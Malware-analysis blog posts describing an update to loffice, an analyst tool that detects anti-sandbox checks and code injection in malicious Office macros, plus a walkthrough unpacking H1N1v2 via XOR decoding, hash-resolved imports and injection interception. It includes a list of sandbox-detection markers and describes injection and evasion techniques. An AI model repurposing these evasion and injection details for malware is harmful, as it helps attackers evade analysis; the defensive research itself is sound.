tHEMbITS - Poking malicious code with sticks...<br />
<br />
Loffice gets a makeover - Gives an insight into antis and detect code injection (2016-11-21)<br />
It has been some time since loffice was last updated. Frankly, there have been updates, but they haven't been pushed, mainly because my initial plan simply grew as bad actors deployed new techniques.<br />
<br />
The updates are in short:<br />
<ul>
<li>Better logging and reporting</li>
<li>Insight into antis</li>
<li>Evade "Recent documents" </li>
<li>Detect code injection</li>
<li>New exit mode</li>
</ul>
For those unfamiliar with loffice, read the initial post <a href="http://thembits.blogspot.se/2016/06/loffice-analyzing-malicious-documents.html">here</a>.<br />
<br />
<h4>
Better logging and reporting</h4>
For those who ran the old version, logging was simply done to stdout, which required the user to scroll through enough rows to get frustrated. This has changed: a directory is created in which each run is saved instead of being written to stdout.<br />
<br />
Feedback will still be given on what is going on while the macro is executed as shown below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIAy_LdGucCOyPmK6FfMssuo75wfI7PhZB4ii4TfTk_4L0Yg9-qF5QQUutvCdv_rr4SRCoaOeKrBMvWkirmH8fsIyB-lERtc4OZeLn5Vp40yNWzOKpUNPT6Ntt9dQWRwd29sLKa9YHi3E/s1600/reporting+feedback.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIAy_LdGucCOyPmK6FfMssuo75wfI7PhZB4ii4TfTk_4L0Yg9-qF5QQUutvCdv_rr4SRCoaOeKrBMvWkirmH8fsIyB-lERtc4OZeLn5Vp40yNWzOKpUNPT6Ntt9dQWRwd29sLKa9YHi3E/s400/reporting+feedback.png" width="400" /></a></div>
<br />
After a session is terminated, either manually or via the selected exit mode, loffice will output a summary on what has been going on.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1N2u6s8pwJWLaNSojUmyumdvG69Duqcr3zAshCl6rSpe3g7f-KzVjAno4FrkU0S7G_BtGs0z9PHqzMCppFMwx0aZzV_hok3dGCqVxaVLPH-uGkAOrJcblGZha3x9jA5Tj-q0odbYCbag/s1600/reporting+summary.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1N2u6s8pwJWLaNSojUmyumdvG69Duqcr3zAshCl6rSpe3g7f-KzVjAno4FrkU0S7G_BtGs0z9PHqzMCppFMwx0aZzV_hok3dGCqVxaVLPH-uGkAOrJcblGZha3x9jA5Tj-q0odbYCbag/s400/reporting+summary.png" width="317" /></a></div>
<br />
A complete picture is available in the log located in the "logs" directory.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWH262GBpH_t3C3OQwWb8Dz9QjtdGCwzxVTfOi56EfwZi2tEggTUkKbTbofsnPIJ8e-ULLmxDPiB7CcZIy_fR6KqH5zDaQBiLLbGiUFtRqU3ttcTPuOzuF2httj4EhKoIC_3WXkUE3QS0/s1600/reporting+logfile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWH262GBpH_t3C3OQwWb8Dz9QjtdGCwzxVTfOi56EfwZi2tEggTUkKbTbofsnPIJ8e-ULLmxDPiB7CcZIy_fR6KqH5zDaQBiLLbGiUFtRqU3ttcTPuOzuF2httj4EhKoIC_3WXkUE3QS0/s320/reporting+logfile.png" width="307" /></a></div>
<br />
This is what was shown in the console in the old version. The images above also show an example of how it will look if loffice detects that code injection is going on. More on this further down.<br />
<br />
<h4>
Insight into antis</h4>
This has been one of the more interesting features to add. In the old version loffice could battle antis by patching WMI queries, for example; in this version it will give an insight, or hint if you will, rather than patching and trying to bypass anti-analysis attempts.<br />
<br />
The number of antis deployed, and that can be deployed, is simply huge, but a common denominator among a large number of them is detecting strings within strings. This can for example be checking whether the document name contains the string <i>"malwr_"</i>, <i>"malware"</i> or <i>".bin"</i>. One of the functions used for such checks is the VBA function <a href="https://msdn.microsoft.com/en-us/library/8460tsh1(v=vs.90).aspx">InStr</a>. As the function in which the compared strings could easily be extracted isn't exported, I needed to locate it statically regardless of the build of the VBA DLL (vbe7.dll). This was done with <a href="https://github.com/erocarrera/pefile">pefile</a> and <a href="http://www.capstone-engine.org/">capstone</a>.<br />
<br />
The result is that it's now possible to see if the macro is trying to profile the machine it's running on. The image below shows the result of a malicious document detecting VMware Tools.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioUD07RTQp0fpYrIDW1FKAI_kxc0zpI857_UZHCimksi4J-leCGU5TgY1hI1lI7XcVAeFwWctHdmTAchMSfhef2woAp6fLsut0rWaHylZw_2L6BNnXVK0EasZ1xTfi6h0B8pPFNwHqN_0/s1600/instr+detected.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioUD07RTQp0fpYrIDW1FKAI_kxc0zpI857_UZHCimksi4J-leCGU5TgY1hI1lI7XcVAeFwWctHdmTAchMSfhef2woAp6fLsut0rWaHylZw_2L6BNnXVK0EasZ1xTfi6h0B8pPFNwHqN_0/s400/instr+detected.png" width="291" /></a></div>
<br />
So if no malicious activity is noted, be sure to check the last lines of the log for hints on why there weren't any malicious actions.<br />
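The kind of hint described above can be produced from the (haystack, needle) pairs a hook on InStr observes. The following is an added example, not loffice's own code: it parses a few constructed hook log lines, matches each needle against an assumed list of profiling markers, and records whether the check would have succeeded on the machine, which is what tells you why a macro went quiet. The log line format and the marker list are assumptions.

```python
# Added example, not loffice's own code: turn the (haystack, needle) pairs seen
# at hooked InStr calls into anti-analysis hints. The log lines are constructed.
import re
from collections import Counter

# Markers that profiling macros commonly look for in document names, paths,
# process lists and hardware strings. Assumed list; extend it as you see fit.
ANTI_MARKERS = {
    "malwr_": "sandbox file naming",
    "malware": "analyst file naming",
    ".bin": "analyst file naming",
    "sample": "analyst file naming",
    "vmware": "virtualisation check",
    "vbox": "virtualisation check",
    "virtualbox": "virtualisation check",
    "sandbox": "sandbox check",
}

# Constructed log lines in the form a hook on InStr might write.
SAMPLE_LOG = """\
InStr haystack="C:\\Users\\user\\Desktop\\invoice_2016.docm" needle=".bin"
InStr haystack="C:\\Users\\user\\Desktop\\invoice_2016.docm" needle="malwr_"
InStr haystack="VMware Tools" needle="VMware"
InStr haystack="Microsoft Office Word" needle="Word"
"""

LINE_RE = re.compile(r'InStr haystack="(?P<hay>[^"]*)" needle="(?P<needle>[^"]*)"')


def parse_instr_log(text):
    """Return a list of (haystack, needle) tuples from hook output."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            calls.append((m.group("hay"), m.group("needle")))
    return calls


def classify_instr_calls(calls):
    """Match each needle against ANTI_MARKERS (case-insensitive) and report
    whether the check would have succeeded here, i.e. whether the needle
    actually occurs in the haystack."""
    hints = []
    for hay, needle in calls:
        n = needle.lower()
        for marker, category in ANTI_MARKERS.items():
            if marker in n:
                hints.append({
                    "needle": needle,
                    "category": category,
                    "matched": n in hay.lower(),
                })
                break
    return hints


def summarize(hints):
    """Category -> number of hits; the line worth printing at the end of a
    session that showed no malicious activity."""
    return dict(Counter(h["category"] for h in hints))


if __name__ == "__main__":
    found = classify_instr_calls(parse_instr_log(SAMPLE_LOG))
    for h in found:
        state = "matched" if h["matched"] else "no match"
        print(f"[anti] {h['category']}: InStr needle {h['needle']!r} ({state})")
    print(summarize(found))
```

The "matched" flag is the useful bit: a needle that matched (here "VMware" in "VMware Tools") explains a macro that exits early, while needles that did not match are just evidence of profiling.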
<br />
<h4>
Evade "Recent documents"</h4>
One of the earlier tricks for detecting sandboxes was to check the number of recently opened documents. If it was under a certain value the macro would fail.<br />
<br />
Loffice will check this on start by counting the number of entries in the registry. Should it find that there are fewer than three items, it will suggest adding a random number of documents with random names so that it seems there has been more activity than there actually has. This is done for the whole Office suite (Word, PowerPoint and Excel).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7YerefKhnRuAhLBAnAfe2Z7NKi-MDtLmgZuxLOPTfoie9JUPJau-wlO95j6cSNl0N8wp6EM-9Pi-r9Nyl_ssuYO68IxH-xXWv9vrcBRP8om3F05SFozysKRl0VVAuaQ9SmKFSEAfUJo/s1600/recent+docs+patch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7YerefKhnRuAhLBAnAfe2Z7NKi-MDtLmgZuxLOPTfoie9JUPJau-wlO95j6cSNl0N8wp6EM-9Pi-r9Nyl_ssuYO68IxH-xXWv9vrcBRP8om3F05SFozysKRl0VVAuaQ9SmKFSEAfUJo/s400/recent+docs+patch.png" width="400" /></a></div>
<br />
<br />
Even though Word has never been launched, loffice will add recent files and make it look like it has been "used".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3IsZtyeRzPzdykguLsOlIJi1_gN91a3zI3xoMK_kp7Y4zAvzItlQ3BT1CinaYRhs09UCGwLkzUTqkVDm-nifXP8MuGJYg8BWrx_Sjp5nbm-7YJ77l11sXpYXnaUFlYR9kUp0NcYBRiGU/s1600/recent+docs+list.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3IsZtyeRzPzdykguLsOlIJi1_gN91a3zI3xoMK_kp7Y4zAvzItlQ3BT1CinaYRhs09UCGwLkzUTqkVDm-nifXP8MuGJYg8BWrx_Sjp5nbm-7YJ77l11sXpYXnaUFlYR9kUp0NcYBRiGU/s320/recent+docs+list.png" width="275" /></a></div>
<br />
<h4>
New exit mode & detecting code injection</h4>
This was one of the techniques I was simply waiting for in the wild: macros that use shellcode to perform RunPE-like operations.<br />
<br />
When injecting a PE into a remote process there are a couple of things that need to be done, such as writing memory to the remote process, setting up the thread context and resuming the remote suspended thread. These steps are used to increase a counter, <i>inject</i>, which is used to determine whether loffice should exit when <i>ZwResumeThread</i> is called.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFzu-jfvQPfLrOb-CiZimByiRmwH8gZeWTcVJr0DG8n1sBZVk721SypUOl-1IxfGxKIZiy-KJ8599Zu6t1kyziOZdP6ev2RFV9jdwNkTrIZb9LmuDPlVFPFLH_WtER1Lt6JTQNMbg6yOk/s1600/inject+summary.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFzu-jfvQPfLrOb-CiZimByiRmwH8gZeWTcVJr0DG8n1sBZVk721SypUOl-1IxfGxKIZiy-KJ8599Zu6t1kyziOZdP6ev2RFV9jdwNkTrIZb9LmuDPlVFPFLH_WtER1Lt6JTQNMbg6yOk/s400/inject+summary.png" width="288" /></a></div>
<br />
In the summary in the image above, loffice has noted that a suspended process has been created and that the "inject" counter is above 2, which results in termination upon the call to <i>ZwResumeThread</i>. A reminder is displayed that the suspended process is still "running", which means that the injected data can be retrieved. Depending on the data written, the log file might reveal where to look:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc0QIhHaPtam4KQMvRHJkuyd0Mli0xc8CTOBFgWET5PEn82PEwX3nPcl586laGWPrxN78NtYkHRo-zHtLLVD8IRfovc-WwyzLmyW-UaXdwLfTjZWXYXrtBuWQrDaHGb3QOrdIaohG0jpg/s1600/inject+log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc0QIhHaPtam4KQMvRHJkuyd0Mli0xc8CTOBFgWET5PEn82PEwX3nPcl586laGWPrxN78NtYkHRo-zHtLLVD8IRfovc-WwyzLmyW-UaXdwLfTjZWXYXrtBuWQrDaHGb3QOrdIaohG0jpg/s400/inject+log.png" width="400" /></a></div>
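The counter logic described in the two paragraphs above, as an added example that is not loffice's own code: a monitor tracks processes created with CREATE_SUSPENDED, counts the injection steps aimed at them, and terminates the session on ZwResumeThread once the counter exceeds the threshold, leaving the target suspended so the written memory can still be dumped. The set of native calls counted as steps, the trace format and the image paths are assumptions; the API trace is constructed.

```python
# Added example, not loffice's own code: replay a trace of hooked API calls and
# apply the "inject" counter logic. The trace is constructed.
CREATE_SUSPENDED = 0x00000004

# Native calls that count as injection steps against a suspended process.
# Assumed set; the page only names writing memory, setting the thread
# context and resuming the thread.
INJECT_STEPS = {
    "NtWriteVirtualMemory",
    "NtMapViewOfSection",
    "NtUnmapViewOfSection",
    "NtSetContextThread",
}


class InjectionMonitor:
    def __init__(self, threshold=2):
        self.threshold = threshold
        self.suspended = {}   # pid -> image path of processes created suspended
        self.inject = {}      # pid -> inject counter
        self.events = []      # human-readable lines for the session summary

    def on_create_process(self, pid, image, flags):
        if flags & CREATE_SUSPENDED:
            self.suspended[pid] = image
            self.inject[pid] = 0
            self.events.append(f"suspended process created: pid={pid} image={image}")

    def on_api_call(self, api, target_pid):
        """Return True when the session should be terminated: ZwResumeThread on
        a suspended process whose inject counter is above the threshold."""
        if target_pid not in self.suspended:
            return False
        if api in INJECT_STEPS:
            self.inject[target_pid] += 1
            self.events.append(f"{api} -> pid {target_pid} (inject={self.inject[target_pid]})")
            return False
        if api == "ZwResumeThread":
            count = self.inject[target_pid]
            if count > self.threshold:
                self.events.append(
                    f"ZwResumeThread on pid {target_pid} with inject={count}: "
                    f"terminating, {self.suspended[target_pid]} is left suspended")
                return True
            self.events.append(f"ZwResumeThread on pid {target_pid} with inject={count}: allowed")
        return False


def replay(trace, threshold=2):
    """Feed ('create', pid, image, flags) / ('api', name, pid) events to a
    monitor; return (terminated, events)."""
    mon = InjectionMonitor(threshold)
    for ev in trace:
        if ev[0] == "create":
            mon.on_create_process(ev[1], ev[2], ev[3])
        elif ev[0] == "api" and mon.on_api_call(ev[1], ev[2]):
            return True, mon.events
    return False, mon.events


# Constructed RunPE-style sequence: create suspended, write twice, set the
# thread context, resume. Paths are placeholders.
RUNPE_TRACE = [
    ("create", 4242, "C:\\example\\target.exe", CREATE_SUSPENDED),
    ("api", "NtWriteVirtualMemory", 4242),
    ("api", "NtWriteVirtualMemory", 4242),
    ("api", "NtSetContextThread", 4242),
    ("api", "ZwResumeThread", 4242),
]

# Constructed benign sequence: a normally created child is never tracked.
BENIGN_TRACE = [
    ("create", 4343, "C:\\example\\child.exe", 0),
    ("api", "ZwResumeThread", 4343),
]

if __name__ == "__main__":
    for name, trace in (("runpe", RUNPE_TRACE), ("benign", BENIGN_TRACE)):
        terminated, events = replay(trace)
        print(f"{name}: terminated={terminated}")
        for line in events:
            print("  " + line)
```

Counting only calls that target a process created suspended keeps ordinary child processes out of the picture; the threshold is what separates a single stray write from the write, set-context, resume sequence of a RunPE.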
<br />
<h4>
Comments</h4>
Hopefully loffice has become more useful and user friendly than before. I have had sessions where loffice failed to set breakpoints (a winappdbg issue), so be sure to run this in a VM. The issue can be spotted if you get a "RuntimeWarning"; in that case none of the breakpoints for that particular module will be set. This has been very random.<br />
<br />
<br />
This version will be the end of the current layout; I will make it more configurable in the future, mainly to make it modular and easy for anyone to contribute. As always, if you have comments, suggestions or anything else, let me know.<br />
<br />
The code is available on <a href="https://github.com/tehsyntx/loffice">Github</a>. As the project has outgrown itself, the quality of the code has gone the same way; re-work will be done, promise :)<br />
<br />
Analyzing H1N1v2: Battle injection and dynamic imports in search of configs (2016-07-22)<br />
While analyzing H1N1v2 I found myself using some methods that I can't remember having read about anywhere in terms of analysis, so I figured I might as well do a short write-up about them. Nothing revolutionary, but hopefully useful. A summary of H1N1v2 itself can be found on <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3851#p28028">Kernelmode</a> and analysis results have been published by <a href="https://www.arbornetworks.com/blog/asert/wp-content/uploads/2015/06/blog_h1n1.pdf">Arbor</a>.<br />
<br />
<br />
<h4>
Getting imports</h4>
As stated in the post above, the sample consists of two parts: the loader, responsible for loading the second part, and the actual payload, responsible for communicating with the C2 server and performing any tasks retrieved from it. The sample used can be found on <a href="https://malwr.com/analysis/MTg4N2MyNmUwM2FiNDc3OGJhY2Q1NTQyOTQxOGM5OGM/">Malwr</a>.<br />
<br />
H1N1 is "crypted" and can be found in the resource section, XOR-encoded using the key <i>ZIOUFAIOjf</i>.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMKNmVuuuICC-bdnLy-Xawy6X8ck_vEr46I_4TgX8uYsx4RSmKcrUiZdMM7YZ4xsgjHm2UTIAx6AuCCNF0qFUBVVt7a_ykd875wB_WF-qjFODnzc2-dbtJYfXDYrZDKiv9OoRVnMRR_Lc/s1600/h1n1-crypt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMKNmVuuuICC-bdnLy-Xawy6X8ck_vEr46I_4TgX8uYsx4RSmKcrUiZdMM7YZ4xsgjHm2UTIAx6AuCCNF0qFUBVVt7a_ykd875wB_WF-qjFODnzc2-dbtJYfXDYrZDKiv9OoRVnMRR_Lc/s400/h1n1-crypt.png" width="400" /></a></div>
<br />
<br />
Static analysis of the "uncrypted" executable shows that there isn't an import section. This by itself is suspicious and suggests that imports are resolved at runtime, making static analysis hard.<br />
<br />
H1N1 resolves all imports for each module: first imports from kernel32 and then ntdll. The imports themselves are resolved by hash, which eliminates the need for strings. The base addresses of the modules are also resolved by hash.<br />
<br />
The function for getting the base address is the first call in the "main" function. The value moved to EBX just before the call looks very much like a hash, and inspecting the function confirms that this is indeed a "resolve by hash" function.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-R-uOcQd32MdlEk_KAGN1TG4GDPYyMAmXI73Nw-lTJrf1abXDMTpf4JlxH_m91-fjX0YsDSr90T3i9DNKvRu1prAwrzCZksn-umGL2MFNKv1EnhTUQTRdRCg549tQbhr7HxlHAKsrZg/s1600/main.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-R-uOcQd32MdlEk_KAGN1TG4GDPYyMAmXI73Nw-lTJrf1abXDMTpf4JlxH_m91-fjX0YsDSr90T3i9DNKvRu1prAwrzCZksn-umGL2MFNKv1EnhTUQTRdRCg549tQbhr7HxlHAKsrZg/s400/main.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-mec-SRp-4J4dhvWKl4-pKW9rLv3unIQTgg3mjrGtKgHspSbZbolsctDKpBiZZGq3xHkQ-2eUw0CpThYbvwkcd-ganXSA13RWYpv7ZZFPVUSudlqgO32_VHB3D5e3VBT1V24IMu674c/s1600/resolve_base.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-mec-SRp-4J4dhvWKl4-pKW9rLv3unIQTgg3mjrGtKgHspSbZbolsctDKpBiZZGq3xHkQ-2eUw0CpThYbvwkcd-ganXSA13RWYpv7ZZFPVUSudlqgO32_VHB3D5e3VBT1V24IMu674c/s400/resolve_base.PNG" width="290" /></a></div>
<br />
<br />
<br />
Before the next function is called, addresses are moved to ESI and EDI; these are pointers to the destination IAT and to an array of hashes representing the imports to be resolved.<br />
<br />
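Two helpers an analyst wants at this stage, the XOR layer from the "crypted" resource above and the hash array that ESI/EDI point at, as one added example that is neither H1N1's code nor the author's: a repeating-key XOR decoder checked against the MZ/PE signature, and a hash-to-name table used to annotate an array of import hashes the way the resolver consumes it. The page does not state which hash algorithm H1N1 uses, so the ROR-13 routine below is a placeholder to be replaced with the one recovered from the resolver; the minimal PE blob and the export list are constructed.

```python
# Added example, not H1N1's code nor the author's: repeating-key XOR decoder
# for the "crypted" resource, plus a hash table for annotating import hashes.
# The hash is a placeholder (ROR 13), not H1N1's algorithm; sample data is
# constructed.
import struct

XOR_KEY = b"ZIOUFAIOjf"  # key named on the page


def xor_decode(data, key):
    """Repeating-key XOR; XOR is its own inverse, so this also encodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data):
    """Cheap sanity check after decoding: MZ header and PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def ror13_hash(name):
    """Placeholder API hash: rotate right by 13 and add each byte, 32-bit."""
    h = 0
    for c in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h


def build_hash_table(export_names, hash_fn=ror13_hash):
    """Map hash -> export name so hashes found in the binary can be annotated."""
    return {hash_fn(n): n for n in export_names}


def resolve_hashes(hashes, table):
    """Mirror what the resolver does with the hash array: one name per hash,
    or None when the hash is unknown (wrong algorithm or wrong module)."""
    return [table.get(h) for h in hashes]


# Constructed minimal "PE": MZ header, e_lfanew = 0x40, PE signature at 0x40.
FAKE_PE = bytearray(0x48)
FAKE_PE[:2] = b"MZ"
struct.pack_into("<I", FAKE_PE, 0x3C, 0x40)
FAKE_PE[0x40:0x44] = b"PE\0\0"
CRYPTED_RESOURCE = xor_decode(bytes(FAKE_PE), XOR_KEY)

# Constructed export list; in practice pull the real one from the module with pefile.
KERNEL32_EXPORTS = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "CreateFileW"]

if __name__ == "__main__":
    plain = xor_decode(CRYPTED_RESOURCE, XOR_KEY)
    print("decoded resource looks like a PE:", looks_like_pe(plain))
    table = build_hash_table(KERNEL32_EXPORTS)
    wanted = [ror13_hash("VirtualAlloc"), ror13_hash("LoadLibraryA"), 0xDEADBEEF]
    for h, name in zip(wanted, resolve_hashes(wanted, table)):
        print(f"{h:08x} -> {name}")
```

Once the real hash routine has been lifted from the resolver, swapping it in for `ror13_hash` and feeding the table the export names of kernel32 and ntdll lets you label the hash array statically instead of stepping through every resolution in the debugger.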
So it's resolving imports, and? As the original executable doesn't have imports on disk, static analysis would be a problem, that much is clear. However, since H1N1 resolves all the imports for each module, it's possible to dump the imports to disk after they have been resolved. This enables much faster static analysis and identification of interesting functions.<br />
<br />
The weapon of choice is ImpRec. Using the "IAT Autosearch" function yields nothing, which means that we must locate the IAT manually; this can be done by following any of the resolved imports in memory. Using the RVA of the IAT, ImpRec is able to find the resolved imports, although with quite a few invalid thunks.<br />
<br />
By cutting away the invalid thunks (<i>Show invalid</i>) the result will be something like:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP6VwCSpokGbymU2Q2F6D5vG6Jh9F7L8Vaoq65qgJ2bTxX30pGF3upwxqgEhaYYCr92p4hpDX77lesiheibtDBABkVjasPX3Qvk2s9Qs44qmBq-eg-fcDzGQXuY8nNftfOnABp4xKyq4/s1600/imprec.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP6VwCSpokGbymU2Q2F6D5vG6Jh9F7L8Vaoq65qgJ2bTxX30pGF3upwxqgEhaYYCr92p4hpDX77lesiheibtDBABkVjasPX3Qvk2s9Qs44qmBq-eg-fcDzGQXuY8nNftfOnABp4xKyq4/s400/imprec.PNG" width="400" /></a></div>
<br />
<br />
After fixing the original file with the imports, the executable can be opened in IDA and the code becomes much easier to analyze.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTtj15FSuK6gmTnqZpKrZ2_lT4EJ12n7R1zIGH7bFpiBOuwzTew2rdmC9y_t842nA4a1EVIObM7s0YtLA7prsMzNEaP6kkPH1yOoN7iMc1OaruRdNrarx98lOa2h2e6Vn-8Xg09Yg6R80/s1600/impfix.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTtj15FSuK6gmTnqZpKrZ2_lT4EJ12n7R1zIGH7bFpiBOuwzTew2rdmC9y_t842nA4a1EVIObM7s0YtLA7prsMzNEaP6kkPH1yOoN7iMc1OaruRdNrarx98lOa2h2e6Vn-8Xg09Yg6R80/s400/impfix.PNG" width="203" /></a></div>
<br />
<br />
This technique will be re-used later on when the final payload is retrieved. Up to this point the loader-part of H1N1 can be analyzed statically using IDA. I won't go into detail on how it works in this post.<br />
<br />
<br />
<h4>
Battle process injection</h4>
The loader is responsible for injecting its payload into another process, namely explorer.exe in this case. The loader creates a new suspended process and a new shared section which holds the payload code. Before the section is mapped into explorer.exe the loader writes code to the entrypoint; this is an excellent place to manipulate the code to make sure that we don't lose control over execution when the process is allowed to continue.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4G8URGPBE6mziZatFcjoWpGeZ91FBs-eNlq5wdZa8BHNJcOuVjqkDFfNrOFwvfwXGCqXtYI47xTee41FrRI27aC4MFq_DQtegPfAgOej-ejRklGcPrva6EvWm7ZSZwFSHCOe33YZJZ0c/s1600/copy-payload.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4G8URGPBE6mziZatFcjoWpGeZ91FBs-eNlq5wdZa8BHNJcOuVjqkDFfNrOFwvfwXGCqXtYI47xTee41FrRI27aC4MFq_DQtegPfAgOej-ejRklGcPrva6EvWm7ZSZwFSHCOe33YZJZ0c/s400/copy-payload.PNG" width="400" /></a></div>
<br />
<br />
To be able to control execution inside explorer.exe after the loader calls ResumeThread, a pause is needed. This can be done in a couple of different ways; I've opted for the "EB FE" approach (jump-to-self).<br />
<br />
Before the code is copied it needs to be patched, which can be done by following ESI (pointing to the source) and patching the first two bytes with EB FE.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZqJ195KJ6phgRm3eU5YcXlbOFcjann0voNU5t4GmICJuSdDxMNObDumDTf4alzWM2vLU4iG9UT4cingpqTo8OWr9zOsAm7FT8xj03hAt9uSvkfRyfCtHZIEiwrxeUz8c4D-cnClEd-Y/s1600/injection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZqJ195KJ6phgRm3eU5YcXlbOFcjann0voNU5t4GmICJuSdDxMNObDumDTf4alzWM2vLU4iG9UT4cingpqTo8OWr9zOsAm7FT8xj03hAt9uSvkfRyfCtHZIEiwrxeUz8c4D-cnClEd-Y/s400/injection.PNG" width="400" /></a></div>
<br />
<br />
The result is that explorer will enter an infinite loop after ResumeThread is called. By attaching to the explorer process and replacing "EB FE" with the original two bytes we now have control over the execution of the injected code. The first thing that happens is again that the base address of kernel32 is located and imports are resolved; the interesting part of this code is a couple of instructions further down from the entrypoint.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisgw1zIowDCSDgAFOi_Aug0WE48LasWQpsZ_Wzk-voNMVIRVUl2ntV7OV7EOy1176J_7tC7keYwF1IJG5J5ItiOx0b8RdZkjrNTBtLWl4e852HNZIn4-8VzMjRJQk7MqFNE3Ja6Sr1BM4/s1600/decode-loop.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisgw1zIowDCSDgAFOi_Aug0WE48LasWQpsZ_Wzk-voNMVIRVUl2ntV7OV7EOy1176J_7tC7keYwF1IJG5J5ItiOx0b8RdZkjrNTBtLWl4e852HNZIn4-8VzMjRJQk7MqFNE3Ja6Sr1BM4/s400/decode-loop.PNG" width="400" /></a></div>
<br />
<br />
This is a loop that decodes something using a simple XOR. Following EDI when entering the loop shows the progress as the loop executes. The end result is an executable, which is the payload of H1N1.<br />
<br />
<br />
<h4>
Fix payload IAT and decode strings</h4>
After unpacking the Upack layer the entrypoint is again very familiar. As this is the actual payload, there will be more than just imports from kernel32 and ntdll, as there need to be imports used to communicate with the C2 server. Therefore there is some work to be done.<br />
<br />
After the imports from kernel32 have been resolved, there is one import of special interest, namely LoadLibraryA: without a specific module loaded, its imports can't be resolved. So a good idea is to fix the imports for the current state (after kernel32 imports have been resolved) and look up xrefs in IDA for LoadLibraryA, which gives an idea of where to look:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
